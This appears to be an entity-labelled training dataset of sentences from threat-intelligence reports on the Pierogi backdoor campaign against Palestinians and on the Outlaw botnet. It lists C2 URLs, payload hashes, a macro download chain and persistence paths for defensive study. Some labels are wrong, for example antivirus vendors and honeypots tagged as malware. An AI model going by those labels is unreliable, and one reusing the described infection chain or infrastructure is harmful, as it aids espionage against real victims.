https://twitter.com/jhone87438316 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://twitter.com/jhone87438316": [[11, 44]]}, "info": {"id": "aptner_train_001234", "source": "aptner_train"}} {"text": "New Cyber Espionage Campaigns Targeting Palestinians - Part 2 : The Discovery of the New , Mysterious Pierogi backdoor .", "spans": {"Malware: Pierogi backdoor": [[102, 118]]}, "info": {"id": "aptner_train_001235", "source": "aptner_train"}} {"text": "Since December 2019 , the Cybereason Nocturnus team has been investigating a campaign targeting Palestinian individuals and entities in the Middle East , mostly within the Palestinian territories .", 
"spans": {"Organization: Cybereason Nocturnus": [[26, 46]]}, "info": {"id": "aptner_train_001236", "source": "aptner_train"}} {"text": "This campaign uses social engineering and decoy documents related to geopolitical affairs and relations between the Palestinian government , and references Egypt , Hezbollah , and Iran .", "spans": {"Organization: Palestinian government": [[116, 138]]}, "info": {"id": "aptner_train_001237", "source": "aptner_train"}} {"text": "Part one of this research investigates the Spark campaign , where attackers use social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor .", "spans": {"Malware: Spark backdoor": [[170, 184]]}, "info": {"id": "aptner_train_001238", "source": "aptner_train"}} {"text": "For more information about part one , click here .", "spans": {}, "info": {"id": "aptner_train_001239", "source": "aptner_train"}} {"text": "During the attacks , victims are infected with a previously undocumented backdoor , dubbed Pierogi by Cybereason .", "spans": {"Malware: backdoor": [[73, 81]], "Malware: Pierogi": [[91, 98]], "Organization: Cybereason": [[102, 112]]}, "info": {"id": "aptner_train_001240", "source": "aptner_train"}} {"text": "This backdoor allows attackers to spy on targeted victims .", "spans": {"Malware: backdoor": [[5, 13]]}, "info": {"id": "aptner_train_001241", "source": "aptner_train"}} {"text": "Cybereason suspects that the backdoor may have been obtained in underground communities rather than home-grown , as the evidence found in the code of the backdoor suggests it may have been developed by Ukranian-speaking hackers .", "spans": {"Organization: Cybereason": [[0, 10]], "Malware: backdoor": [[29, 37]]}, "info": {"id": "aptner_train_001242", "source": "aptner_train"}} {"text": "The tactics , techniques , and procedures ( TTPs ) , content , and theme of the decoy documents , as well as the victimology observed in the campaign , resemble previous attacks that have targeted 
Palestinians .", "spans": {}, "info": {"id": "aptner_train_001243", "source": "aptner_train"}} {"text": "In particular , these campaigns appear to be related to attacks carried out by a group called MoleRATs ( aka , Gaza Cyber Gang , Moonlight ) , an Arabic-speaking , politically motivated group that has been operating in the Middle East since 2012 .", "spans": {"Organization: MoleRATs": [[94, 102]], "Organization: Gaza Cyber Gang": [[111, 126]], "Organization: Moonlight": [[129, 138]]}, "info": {"id": "aptner_train_001244", "source": "aptner_train"}} {"text": "Cyber Espionage with a New Malware : The Cybereason Nocturnus team has discovered recent , targeted attacks in the Middle East to deliver the Pierogi backdoor for politically-driven cyber espionage .", "spans": {"Organization: Cybereason Nocturnus": [[41, 61]], "Malware: Pierogi backdoor": [[142, 158]]}, "info": {"id": "aptner_train_001245", "source": "aptner_train"}} {"text": "Using Geopolitically-charged Lure Content : The attackers use specially crafted lure content to trick their targets into opening malicious files that infect the victim ’s machine with the Pierogi backdoor .", "spans": {"Malware: Pierogi backdoor": [[188, 204]]}, "info": {"id": "aptner_train_001247", "source": "aptner_train"}} {"text": "The decoy content of the malicious files revolves around various political affairs in the Middle East , specifically targeting the tension between Hamas and other entities in the region .", "spans": {}, "info": {"id": "aptner_train_001248", "source": "aptner_train"}} {"text": "Perpetrated by an Arabic-speaking APT , MoleRATs : The modus-operandi of the attackers as well as the social engineering decoy content seem aligned with previous attacks carried out by an Arabic-speaking APT group called MoleRATs ( aka Gaza Cybergang ) .", "spans": {"Organization: MoleRATs": [[40, 48], [221, 229]], "Organization: Gaza Cybergang": [[236, 250]]}, "info": {"id": "aptner_train_001249", "source": "aptner_train"}} 
{"text": "Similar to previous attacks , this campaign starts with social engineering .", "spans": {}, "info": {"id": "aptner_train_001251", "source": "aptner_train"}} {"text": "In one instance , it lures victims to open an email attachment .", "spans": {"System: email": [[46, 51]]}, "info": {"id": "aptner_train_001252", "source": "aptner_train"}} {"text": "In others , it persuades victims to download a report about a recent political affair pertaining to the Middle East and specifically to Palestinian matters .", "spans": {}, "info": {"id": "aptner_train_001253", "source": "aptner_train"}} {"text": "In most cases , the downloaded file is either an executable that masquerades as a Microsoft Word document or a weaponized Microsoft Word document .", "spans": {"System: Microsoft Word document": [[82, 105]], "System: weaponized Microsoft Word": [[111, 136]]}, "info": {"id": "aptner_train_001254", "source": "aptner_train"}} {"text": "As soon as the victim double-clicks on the dropper , they are presented with the decoy document .", "spans": {}, "info": {"id": "aptner_train_001255", "source": "aptner_train"}} {"text": "The document lowers the victim ’s suspicions by distracting them with a real document while the dropper installs the backdoor .", "spans": {"Malware: backdoor": [[117, 125]]}, "info": {"id": "aptner_train_001256", "source": "aptner_train"}} {"text": "However , some of the documents also play an additional role in the attack .", "spans": {}, "info": {"id": "aptner_train_001257", "source": "aptner_train"}} {"text": "While some are more neutral , quoting from newspapers and the media , others seem to report fake news to spread misinformation that serves a political agenda .", "spans": {}, "info": {"id": "aptner_train_001258", "source": "aptner_train"}} {"text": "With regards to decoy content themes , this campaign resembles previous campaigns reported in blogs by Vectra , Unit 42 , and Talos .", "spans": {"Organization: Unit 42": [[112, 119]], "Organization: 
Talos": [[126, 131]]}, "info": {"id": "aptner_train_001259", "source": "aptner_train"}} {"text": "The contents of the decoy documents seems to include :", "spans": {}, "info": {"id": "aptner_train_001260", "source": "aptner_train"}} {"text": "Potentially fake documents that appear to be issued by the Palestinian government .", "spans": {"Organization: Palestinian government": [[59, 81]]}, "info": {"id": "aptner_train_001261", "source": "aptner_train"}} {"text": "Meetings minutes of different Palestinian organizations .", "spans": {}, "info": {"id": "aptner_train_001262", "source": "aptner_train"}} {"text": "News about Hamas and the Palestinian National Authority .", "spans": {"Organization: Palestinian National Authority": [[25, 55]]}, "info": {"id": "aptner_train_001263", "source": "aptner_train"}} {"text": "Potentially fake , leaked Hamas documents .", "spans": {}, "info": {"id": "aptner_train_001264", "source": "aptner_train"}} {"text": "Criticism of and embarrassing content about Hamas .", "spans": {}, "info": {"id": "aptner_train_001265", "source": "aptner_train"}} {"text": "APA adopted resolution Unlimited support for Palestinian people.docx :", "spans": {"Organization: APA": [[0, 3]]}, "info": {"id": "aptner_train_001266", "source": "aptner_train"}} {"text": "Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . 
jalsa.rar :", "spans": {"Organization: Asian Parliamentary Assembly": [[30, 58]], "Organization: APA": [[61, 64]], "Indicator: 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c": [[142, 206]], "Indicator: jalsa.rar": [[209, 218]]}, "info": {"id": "aptner_train_001267", "source": "aptner_train"}} {"text": "Contains the above mentioned document , as well as photos of the assemblies and political cartoons criticizing Hamas 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b .", "spans": {"Indicator: 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b": [[117, 181]]}, "info": {"id": "aptner_train_001268", "source": "aptner_train"}} {"text": "Internet in government.pdf / Define the Internet in government institutions.pdf :", "spans": {"Indicator: Internet in government.pdf": [[0, 26]], "Indicator: Define the Internet in government institutions.pdf": [[29, 79]]}, "info": {"id": "aptner_train_001269", "source": "aptner_train"}} {"text": "Announcement about a new regulation regarding internet usage in Palestinian government institutions .", "spans": {"Organization: Palestinian government": [[64, 86]]}, "info": {"id": "aptner_train_001270", "source": "aptner_train"}} {"text": "The announcement states that porn , gambling and entertainment sites will be blocked 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 .", "spans": {"Indicator: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[85, 149]]}, "info": {"id": "aptner_train_001271", "source": "aptner_train"}} {"text": "Congratulations_Jan-7.pdf :", "spans": {"Indicator: Congratulations_Jan-7.pdf": [[0, 25]]}, "info": {"id": "aptner_train_001272", "source": "aptner_train"}} {"text": "Letter allegedly from the Barcelona branch of the", "spans": {"Organization: Barcelona": [[26, 35]]}, "info": {"id": "aptner_train_001273", "source": "aptner_train"}} {"text": "Federation of Independent Palestinian Communities and Organizations and Events in the Diaspora 
.", "spans": {"Organization: Federation of Independent Palestinian Communities and Organizations and Events": [[0, 78]]}, "info": {"id": "aptner_train_001274", "source": "aptner_train"}} {"text": "The letter commemorates the 73rd anniversary of the Syrian Army , and expresses the Palestinian support of Bashar Al-Asad .", "spans": {"Organization: Syrian Army": [[52, 63]]}, "info": {"id": "aptner_train_001275", "source": "aptner_train"}} {"text": "The letter ends with “ Death to Israel ” and “ Humiliation and shame to the tyrant America ” 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc .", "spans": {"Indicator: 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc": [[93, 157]]}, "info": {"id": "aptner_train_001276", "source": "aptner_train"}} {"text": "Daily_Report.docx :", "spans": {"Indicator: Daily_Report.docx": [[0, 17]]}, "info": {"id": "aptner_train_001277", "source": "aptner_train"}} {"text": "Daily summary of news concerning different Palestinian govenment related issues d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 .", "spans": {"Organization: Palestinian govenment": [[43, 64]], "Indicator: d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428": [[80, 144]]}, "info": {"id": "aptner_train_001278", "source": "aptner_train"}} {"text": "Directory of Government Services.pdf :", "spans": {"Indicator: Directory of Government Services.pdf": [[0, 36]]}, "info": {"id": "aptner_train_001279", "source": "aptner_train"}} {"text": "A screenshot from a website of the Palestinian government , showing a directory of the different ministries 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 .", "spans": {"Organization: Palestinian government": [[35, 57]], "Indicator: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[108, 172]]}, "info": {"id": "aptner_train_001280", "source": "aptner_train"}} {"text": "Meeting Agenda.pdf :", "spans": {"Indicator: Meeting Agenda.pdf": [[0, 18]]}, 
"info": {"id": "aptner_train_001281", "source": "aptner_train"}} {"text": "Corrupted file f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . imgonline-com-ua-dexifEEdWuIbNSv7G.jpg :", "spans": {"Indicator: f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427": [[15, 79]], "Indicator: imgonline-com-ua-dexifEEdWuIbNSv7G.jpg": [[82, 120]]}, "info": {"id": "aptner_train_001282", "source": "aptner_train"}} {"text": "potentially leaked Hamas document detailing Hamas 32nd anniversary expenses in different regions in the Palestinian Territories 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb .", "spans": {"Indicator: 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb": [[128, 192]]}, "info": {"id": "aptner_train_001283", "source": "aptner_train"}} {"text": "Asala.mp3 :", "spans": {"Indicator: Asala.mp3": [[0, 9]]}, "info": {"id": "aptner_train_001284", "source": "aptner_train"}} {"text": "An .mp3 file of a song by the famous Syrian singer Asala Nasri ( song name : Fen Habibi , translation : “ where is my loved one? 
” ) 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 .", "spans": {"Indicator: .mp3": [[3, 7]], "Indicator: 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964": [[133, 197]]}, "info": {"id": "aptner_train_001285", "source": "aptner_train"}} {"text": "In addition to the documents , the content includes a number of political cartoons that criticize Hamas ’ relations with Iran and Hamas ’ standing as a resistance movement .", "spans": {}, "info": {"id": "aptner_train_001286", "source": "aptner_train"}} {"text": "While the majority of infections in this campaign did not originate from Malicious Microsoft Word document , the Cybereason Nocturnus team found several weaponized Microsoft Word document with an embedded downloader macro that downloads and installs the backdoor used in this attack .", "spans": {"System: Malicious Microsoft Word document": [[73, 106]], "Organization: Cybereason Nocturnus": [[113, 133]], "System: weaponized Microsoft Word document": [[153, 187]], "System: downloader macro": [[205, 221]], "Malware: backdoor": [[254, 262]]}, "info": {"id": "aptner_train_001287", "source": "aptner_train"}} {"text": "CV Manal 1 :", "spans": {"Indicator: CV Manal 1": [[0, 10]]}, "info": {"id": "aptner_train_001288", "source": "aptner_train"}} {"text": "Resume of a woman from Abu-Dis , Palestinian Authority 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f .", "spans": {"Organization: Palestinian Authority": [[33, 54]], "Indicator: 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f": [[55, 119]]}, "info": {"id": "aptner_train_001289", "source": "aptner_train"}} {"text": "Employee-entitlements-2020.doc :", "spans": {"Indicator: Employee-entitlements-2020.doc": [[0, 30]]}, "info": {"id": "aptner_train_001290", "source": "aptner_train"}} {"text": "A statement of the Ministry of Finance on civil and military employee benefits and salaries , discussing the conterversial issue Palestinian Authority employees that 
have not been paid or paid in full their salaries b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80 .", "spans": {"Organization: Ministry of Finance": [[19, 38]], "Organization: Palestinian Authority": [[129, 150]], "Indicator: b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80": [[216, 280]]}, "info": {"id": "aptner_train_001291", "source": "aptner_train"}} {"text": "When the victims open the document , they are encouraged to click on Enable Content , which causes the embedded malicious macro code to run .", "spans": {"System: malicious macro": [[112, 127]]}, "info": {"id": "aptner_train_001292", "source": "aptner_train"}} {"text": "The macro code embedded in the document is rather simple and is not obfuscated .", "spans": {}, "info": {"id": "aptner_train_001293", "source": "aptner_train"}} {"text": "In fact , it is almost unusual in its unsophistication .", "spans": {}, "info": {"id": "aptner_train_001294", "source": "aptner_train"}} {"text": "The macro code does the following :", "spans": {}, "info": {"id": "aptner_train_001295", "source": "aptner_train"}} {"text": "Downloads a Base64 encoded payload from the following URL :", "spans": {}, "info": {"id": "aptner_train_001296", "source": "aptner_train"}} {"text": "http://linda-callaghan.icu/Minkowski/brown .", "spans": {"Indicator: http://linda-callaghan.icu/Minkowski/brown": [[0, 42]]}, "info": {"id": "aptner_train_001297", "source": "aptner_train"}} {"text": "Writes the decoded payload to C:\\ProgramData\\IntegratedOffice.txt .", "spans": {}, "info": {"id": "aptner_train_001298", "source": "aptner_train"}} {"text": "Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice.exe .", "spans": {"Indicator: C:\\ProgramData\\IntegratedOffice.exe": [[50, 85]]}, "info": {"id": "aptner_train_001299", "source": "aptner_train"}} {"text": "Runs the executable file and deletes the .txt file .", "spans": {"Indicator: .txt": [[41, 45]]}, "info": {"id": 
"aptner_train_001300", "source": "aptner_train"}} {"text": "Pierogi , the backdoor in this attack , appears to be a new backdoor written in Delphi .", "spans": {"Malware: Pierogi": [[0, 7]], "Malware: backdoor": [[14, 22]], "System: backdoor": [[60, 68]], "System: Delphi": [[80, 86]]}, "info": {"id": "aptner_train_001301", "source": "aptner_train"}} {"text": "It enables the attackers to spy on victims using rather basic backdoor capabilities .", "spans": {"Malware: backdoor": [[62, 70]]}, "info": {"id": "aptner_train_001302", "source": "aptner_train"}} {"text": "While it is unknown at this point whether the backdoor was coded by the same members of the group behind the attacks , there are indications that suggest that the malware was authored by Ukranian-speaking malware developers .", "spans": {"Malware: backdoor": [[46, 54]]}, "info": {"id": "aptner_train_001303", "source": "aptner_train"}} {"text": "The commands used to communicate with the C2 servers and other strings in the binary are written in Ukrainian .", "spans": {"System: C2": [[42, 44]]}, "info": {"id": "aptner_train_001304", "source": "aptner_train"}} {"text": "This is why we chose to name the malware Pierogi , after the popular East European dish .", "spans": {"Malware: Pierogi": [[41, 48]]}, "info": {"id": "aptner_train_001305", "source": "aptner_train"}} {"text": "The backdoor has the following capabilities :", "spans": {}, "info": {"id": "aptner_train_001306", "source": "aptner_train"}} {"text": "Collects information about the infected machine .", "spans": {}, "info": {"id": "aptner_train_001307", "source": "aptner_train"}} {"text": "Uploads files to the attackers ’ server .", "spans": {}, "info": {"id": "aptner_train_001308", "source": "aptner_train"}} {"text": "Downloads additional payloads .", "spans": {}, "info": {"id": "aptner_train_001309", "source": "aptner_train"}} {"text": "Takes screenshots from the infected machine .", "spans": {}, "info": {"id": "aptner_train_001310", "source": 
"aptner_train"}} {"text": "Executes arbitrary commands via the CMD shell .", "spans": {"System: CMD shell": [[36, 45]]}, "info": {"id": "aptner_train_001311", "source": "aptner_train"}} {"text": "In addition to spy features , the backdoor also implements a few checks to ensure it is running in a safe environment .", "spans": {"Malware: backdoor": [[34, 42]]}, "info": {"id": "aptner_train_001312", "source": "aptner_train"}} {"text": "Specifically , it looks for antivirus and other security products .", "spans": {}, "info": {"id": "aptner_train_001313", "source": "aptner_train"}} {"text": "The backdoor queries Windows for installed antivirus software using WMI : SELECT * FROM AntiVirusProduct It looks for specific antivirus and security products installed on the infected machine , such as Kaspersky , eScan , F-secure and Bitdefender .", "spans": {"Malware: backdoor": [[4, 12]], "System: Windows": [[21, 28]], "System: WMI": [[68, 71]], "Organization: Kaspersky": [[203, 212]], "Malware: eScan": [[215, 220]], "Malware: F-secure": [[223, 231]], "Malware: Bitdefender": [[236, 247]]}, "info": {"id": "aptner_train_001314", "source": "aptner_train"}} {"text": "The backdoor achieves persistence using a classic startup item autorun technique :", "spans": {"Malware: backdoor": [[4, 12]]}, "info": {"id": "aptner_train_001315", "source": "aptner_train"}} {"text": "A shortcut is added to the the startup folder : C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup .", "spans": {}, "info": {"id": "aptner_train_001316", "source": "aptner_train"}} {"text": "Once the user logs on to the infected machine , the shortcut points to the file binary location in the C:\\ProgramData\\ folder .", "spans": {}, "info": {"id": "aptner_train_001317", "source": "aptner_train"}} {"text": "The GUID generated by the malware is saved in a file called GUID.bin .", "spans": {"System: GUID": [[4, 8]], "Indicator: GUID.bin": [[60, 68]]}, "info": {"id": "aptner_train_001318", 
"source": "aptner_train"}} {"text": "This file is created in the same folder as the binary of the backdoor", "spans": {"Malware: backdoor": [[61, 69]]}, "info": {"id": "aptner_train_001319", "source": "aptner_train"}} {"text": "( C:\\ProgramData\\GUID.bin ) .", "spans": {}, "info": {"id": "aptner_train_001320", "source": "aptner_train"}} {"text": "The backdoor has rather basic C2 functionality implemented through a predefined set of URLs :", "spans": {"Malware: backdoor": [[4, 12]], "System: C2": [[30, 32]]}, "info": {"id": "aptner_train_001321", "source": "aptner_train"}} {"text": "1 .", "spans": {}, "info": {"id": "aptner_train_001322", "source": "aptner_train"}} {"text": "Sending machine information and a heartbeat to the C2 :", "spans": {"System: C2": [[51, 53]]}, "info": {"id": "aptner_train_001323", "source": "aptner_train"}} {"text": "URL : http://nicoledotson.icu/debby/weatherford/Yortysnr The information sent to the C2 includes :", "spans": {"Indicator: http://nicoledotson.icu/debby/weatherford/Yortysnr": [[6, 56]], "System: C2": [[85, 87]]}, "info": {"id": "aptner_train_001324", "source": "aptner_train"}} {"text": "cname :", "spans": {}, "info": {"id": "aptner_train_001325", "source": "aptner_train"}} {"text": "computer name , username , and GUID . av : Name of detected antivirus . osversion : version of the operating system . 
aname : the location of the malware on the infected machine .", "spans": {"System: GUID": [[31, 35]]}, "info": {"id": "aptner_train_001326", "source": "aptner_train"}} {"text": "Requesting commands from the C2 server :", "spans": {"System: C2": [[29, 31]]}, "info": {"id": "aptner_train_001327", "source": "aptner_train"}} {"text": "URL : http://nicoledotson.icu/debby/weatherford/Ekspertyza .", "spans": {"Indicator: http://nicoledotson.icu/debby/weatherford/Ekspertyza": [[6, 58]]}, "info": {"id": "aptner_train_001328", "source": "aptner_train"}} {"text": "Ekspertyza means expertise or examination in Ukranian .", "spans": {}, "info": {"id": "aptner_train_001329", "source": "aptner_train"}} {"text": "There are 3 basic commands coming from the server in the form of MD5 hashes :", "spans": {}, "info": {"id": "aptner_train_001330", "source": "aptner_train"}} {"text": "Dfff0a7fa1a55c8c1a4966c19f6da452 : cmd . 51a7a76a7dd5d9e4651fe3d4c74d16d6 : downloadfile . 62c92ba585f74ecdbef4c4498a438984 : screenshot .", "spans": {"Indicator: Dfff0a7fa1a55c8c1a4966c19f6da452": [[0, 32]], "Indicator: 51a7a76a7dd5d9e4651fe3d4c74d16d6": [[41, 73]], "Indicator: 62c92ba585f74ecdbef4c4498a438984": [[91, 123]]}, "info": {"id": "aptner_train_001331", "source": "aptner_train"}} {"text": "Uploading data ( mainly screenshots ) to the C2 :", "spans": {"System: C2": [[45, 47]]}, "info": {"id": "aptner_train_001332", "source": "aptner_train"}} {"text": "URL : http://nicoledotson.icu/debby/weatherford/Zavantazhyty .", "spans": {"Indicator: http://nicoledotson.icu/debby/weatherford/Zavantazhyty": [[6, 60]]}, "info": {"id": "aptner_train_001333", "source": "aptner_train"}} {"text": "Zavantazhyty means to load or download in Ukranian .", "spans": {}, "info": {"id": "aptner_train_001334", "source": "aptner_train"}} {"text": "This command is used to upload collected data to the C2 server .", "spans": {"System: C2": [[53, 55]]}, "info": {"id": "aptner_train_001335", "source": "aptner_train"}} {"text": "For 
example , in some instances the backdoor uploads screenshots taken from an infected machine , as can be seen in the example below .", "spans": {"Malware: backdoor": [[36, 44]]}, "info": {"id": "aptner_train_001336", "source": "aptner_train"}} {"text": "Removing information :", "spans": {}, "info": {"id": "aptner_train_001337", "source": "aptner_train"}} {"text": "URL : http://nicoledotso.icu/debby/weatherford/Vydalyty .", "spans": {"Indicator: http://nicoledotso.icu/debby/weatherford/Vydalyty": [[6, 55]]}, "info": {"id": "aptner_train_001338", "source": "aptner_train"}} {"text": "Vydalyty means to remove or delete in Ukrainian .", "spans": {}, "info": {"id": "aptner_train_001339", "source": "aptner_train"}} {"text": "The malware can delete various requests based on the command below .", "spans": {}, "info": {"id": "aptner_train_001340", "source": "aptner_train"}} {"text": "The records of the domains and IPs involved in this campaign seem to show that the attackers created a new infrastructure specifically for this campaign .", "spans": {}, "info": {"id": "aptner_train_001341", "source": "aptner_train"}} {"text": "The domains were registered in November 2019 and operationalized shortly after .", "spans": {}, "info": {"id": "aptner_train_001342", "source": "aptner_train"}} {"text": "In part two of this research , we examined the Pierogi campaign .", "spans": {}, "info": {"id": "aptner_train_001343", "source": "aptner_train"}} {"text": "Cybereason suspects this", "spans": {"Organization: Cybereason": [[0, 10]]}, "info": {"id": "aptner_train_001344", "source": "aptner_train"}} {"text": "campaign targets Palestinian individuals and entities in the Middle East , specifically directed at", "spans": {}, "info": {"id": "aptner_train_001345", "source": "aptner_train"}} {"text": "those in the Palestinian government .", "spans": {"Organization: Palestinian government": [[13, 35]]}, "info": {"id": "aptner_train_001346", "source": "aptner_train"}} {"text": "The threat actors 
behind the campaign use social engineering to infect their victims with the Pierogi backdoor for cyber espionage purposes .", "spans": {"Malware: Pierogi backdoor": [[94, 110]]}, "info": {"id": "aptner_train_001347", "source": "aptner_train"}} {"text": "The threat actor behind the attack invested considerable time and effort to lure their victims with specially-crafted documents that target Palestinian individuals and entities in the Middle East .", "spans": {}, "info": {"id": "aptner_train_001348", "source": "aptner_train"}} {"text": "In our analysis , we reviewed the TTPs and the decoy content , and pointed out the similarities between previous attacks that have been attributed to MoleRATs , an Arabic-speaking , politically motivated group that has operated", "spans": {"Organization: MoleRATs": [[150, 158]]}, "info": {"id": "aptner_train_001349", "source": "aptner_train"}} {"text": "in the Middle East since 2012 .", "spans": {}, "info": {"id": "aptner_train_001350", "source": "aptner_train"}} {"text": "The Pierogi backdoor discovered by Cybereason during this investigation seems to be undocumented and gives the threat actors espionage capabilities over their victims .", "spans": {"Malware: Pierogi backdoor": [[4, 20]], "Organization: Cybereason": [[35, 45]]}, "info": {"id": "aptner_train_001351", "source": "aptner_train"}} {"text": "Based on the Ukranian language embedded in the backdoor , Cybereason raises the possibility that the backdoor was obtained in underground communities by the threat actors , rather than developed in-house by the group .", "spans": {"Malware: backdoor": [[47, 55], [101, 109]], "Organization: Cybereason": [[58, 68]]}, "info": {"id": "aptner_train_001352", "source": "aptner_train"}} {"text": "As we ’ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence does n’t necessarily mean inactivity .", "spans": {}, "info": {"id": "aptner_train_001354", "source": "aptner_train"}} {"text": "This time , the 
group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors .", "spans": {"Vulnerability: CVE-2016-8655": [[63, 76]], "Vulnerability: Dirty COW": [[81, 90]], "Vulnerability: CVE-2016-5195": [[101, 114]]}, "info": {"id": "aptner_train_001363", "source": "aptner_train"}} {"text": "Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials .", "spans": {}, "info": {"id": "aptner_train_001364", "source": "aptner_train"}} {"text": "We also considered the move as an obfuscation technique , as it was mixed with a lot of script kiddie activities that can easily be mistaken for grey noise online .", "spans": {}, "info": {"id": "aptner_train_001367", "source": "aptner_train"}} {"text": "The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times .", "spans": {}, "info": {"id": "aptner_train_001368", "source": "aptner_train"}} {"text": "The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt .", "spans": {}, "info": {"id": "aptner_train_001374", "source": "aptner_train"}} {"text": "The script then waits 20 minutes before it runs the wrapper script initall :", "spans": {"Indicator: initall": [[67, 74]]}, "info": {"id": "aptner_train_001375", "source": "aptner_train"}} {"text": "2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a install .", "spans": {"Indicator: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a": [[0, 64]], "Indicator: install": [[65, 72]]}, "info": {"id": "aptner_train_001376", "source": "aptner_train"}} {"text": " . 
93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494", "spans": {}, "info": {"id": "aptner_train_001384", "source": "aptner_train"}} {"text": " .", "spans": {}, "info": {"id": "aptner_train_001385", "source": "aptner_train"}} {"text": "However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits ’ latest version .", "spans": {}, "info": {"id": "aptner_train_001393", "source": "aptner_train"}} {"text": "We also found traces of Android Package Kits- ( APK- ) and Android Debug Bridge ( ADB )-based commands that enable cryptocurrency mining activities in Android-based TVs .", "spans": {"System: Android Package Kits-": [[24, 45]], "System: APK-": [[48, 52]], "System: Android Debug Bridge": [[59, 79]], "System: ADB": [[82, 85]], "System: Android-based TVs": [[151, 168]]}, "info": {"id": "aptner_train_001397", "source": "aptner_train"}} {"text": "Furthermore , based on the group ’s use of dated exploits as vectors that companies would have likely addressed with monitoring and regular patching schedules , it appears that they ’re going after enterprises who have yet to patch their systems , as well as companies with internet-facing systems with weak to no monitoring of traffic and activities .", "spans": {}, "info": {"id": "aptner_train_001401", "source": "aptner_train"}} {"text": "Considering the amount of resources needed to deploy all the necessary patches for an enterprise ( such as quality testing and operations alignment ) , which implies costly downtime for operations and the hesitation to update all systems immediately , Outlaw may find even more targets and victims for their updated botnets every time there is a patch released and waiting to be downloaded .", "spans": {"Organization: Outlaw": [[252, 258]]}, "info": {"id": "aptner_train_001402", "source": "aptner_train"}} {"text": "Save for a few iteration updates , combinations from previous deployments , and using the routines repetitively 
for every campaign , we found very little changes in the group ’s toolkit , which allowed various honeypots across the Eastern European region to detect many of the sent binaries .", "spans": {"Malware: honeypots": [[210, 219]]}, "info": {"id": "aptner_train_001403", "source": "aptner_train"}} {"text": "Meanwhile , the group uses a wide range of IP addresses as input for scanning activities that are grouped by country , allowing them to attack certain regions or areas within particular periods of the year , as previously observed .", "spans": {}, "info": {"id": "aptner_train_001404", "source": "aptner_train"}} {"text": "We think the group has likely become more enterprising , and learned to take advantage of some details from their previous campaigns to maximize profit opportunities while exerting minimal effort .", "spans": {}, "info": {"id": "aptner_train_001405", "source": "aptner_train"}} {"text": "By shaping the attack , the group may be able to create niches in the underground , catering to the specific needs of their customers .", "spans": {}, "info": {"id": "aptner_train_001406", "source": "aptner_train"}} {"text": "Also aware of the existing laws in Europe , they can avoid prosecution in certain countries as long as they avoid attacking them .", "spans": {}, "info": {"id": "aptner_train_001407", "source": "aptner_train"}} {"text": "Collection of results and data from scanning in this manner might be easier to sort ( while allowing them to stay under the radar ) , as compared to getting feedback from zombie bots deployed around the world simultaneously .", "spans": {}, "info": {"id": "aptner_train_001408", "source": "aptner_train"}} {"text": "We will continue to monitor this hacking group ’s activities and their toolkit ’s developments .", "spans": {}, "info": {"id": "aptner_train_001409", "source": "aptner_train"}} {"text": "Outlaw ’s attack routines may not be new , but it still serves as a reminder for enterprises to update their systems regularly .", 
